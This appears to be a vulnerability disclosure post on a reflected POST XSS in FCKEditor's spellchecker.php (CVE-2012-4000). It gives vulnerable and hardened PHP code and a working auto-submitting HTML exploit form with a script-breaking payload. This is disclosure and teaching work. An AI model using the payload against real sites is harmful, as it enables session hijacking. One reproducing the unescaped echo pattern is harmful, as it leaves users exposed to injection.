I recently found a reflected POST XSS in a popular web WYSIWYG editor called FCKEditor. Despite being almost end-of-life and having been replaced by CKEditor since 2009, FCKEditor is still widely deployed, both as a stand-alone application and embedded in various WordPress/Joomla/Drupal extensions.
Today, 2012-06-22, Google counts more than 1.5 billion results. A plausible Google dork that filters out PHP sources could be:
The reflected XSS is injected through the textinputs POST parameter array, which is not sanitized before being printed into a JavaScript block at line 27 of spellchecker.php:
echo "textinputs[$key] = decodeURIComponent(\"" . $val . "\");\n";
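To make the defect concrete, here is the vulnerable pattern next to a hardened rewrite. This is an added example written for this post, not FCKEditor's own code: the function names, the (int) cast on the key, and the sample payload array are assumptions of mine; only the echo line mirrors what spellchecker.php does. The fix lets json_encode() build the JavaScript string literal, with the JSON_HEX_* flags so that quotes, angle brackets and ampersands become \u escapes and can never close the string, the call, or the enclosing <script> element.

```php
<?php
// Added example, not FCKEditor source. Demonstrates why the textinputs[]
// echo is exploitable and how to emit the same JavaScript safely.

// Vulnerable pattern: each POSTed value is concatenated straight into a
// JavaScript string literal inside a <script> block. A value such as
//   ");alert(1);</script><!--
// closes the string, the decodeURIComponent() call and the script tag,
// then runs attacker-controlled JavaScript in the victim's session.
function emit_textinputs_vulnerable(array $textinputs): string
{
    $out = '';
    foreach ($textinputs as $key => $val) {
        $out .= "textinputs[$key] = decodeURIComponent(\"" . $val . "\");\n";
    }
    return $out;
}

// Hardened version (assumed rewrite, not the upstream patch):
//  1. only scalar strings are accepted; nested arrays are skipped,
//  2. json_encode() produces the JS string literal, and the JSON_HEX_*
//     flags escape < > & ' " as \uXXXX so the output cannot break out of
//     the <script> element or the string,
//  3. the array index is cast to int so $key cannot inject either.
function emit_textinputs_hardened(array $textinputs): string
{
    $out = '';
    foreach ($textinputs as $key => $val) {
        if (!is_string($val)) {
            continue;
        }
        $js = json_encode(
            $val,
            JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT
        );
        if ($js === false) {
            // invalid UTF-8 or similar: drop the entry instead of emitting garbage
            continue;
        }
        $out .= 'textinputs[' . (int) $key . '] = decodeURIComponent(' . $js . ");\n";
    }
    return $out;
}

// Constructed sample input mirroring the PoC payload (not real traffic).
$payload = [0 => '");alert("THIS SITE IS XSS VULNERABLE!");</script><!--'];

echo "--- vulnerable output (breaks out of the string and the script tag) ---\n";
echo emit_textinputs_vulnerable($payload);
echo "--- hardened output (payload stays an inert string literal) ---\n";
echo emit_textinputs_hardened($payload);
```

Run it from the command line with `php example.php`: the first block shows the payload spliced into live JavaScript, the second shows the same payload as a single quoted literal whose `"`, `<`, `>` and `/` characters have been escaped, so decodeURIComponent() receives the original text but the browser never parses it as markup or code. The same json_encode() flags are the right tool wherever PHP writes request data into an inline <script>.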
As with any reflected XSS, an attacker can use this to execute arbitrary HTML and script code in the browser session of a user who visits a malicious page, for example to steal the legitimate user's session cookie and bypass the CMS authorization. Because the parameter is sent via the POST HTTP method, the PoC is CSRF-like: a page under the attacker's control auto-submits a hidden form to the vulnerable script, and the reflected payload runs in the victim's origin.

<html>
<body>
<iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe>
<form method="post" name="sender" action="http://vuln.com/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php" target="hidden">
<input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' />
</form>
<script>document.sender.submit();</script>
</body>
</html>
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2012-4000 to this vulnerability.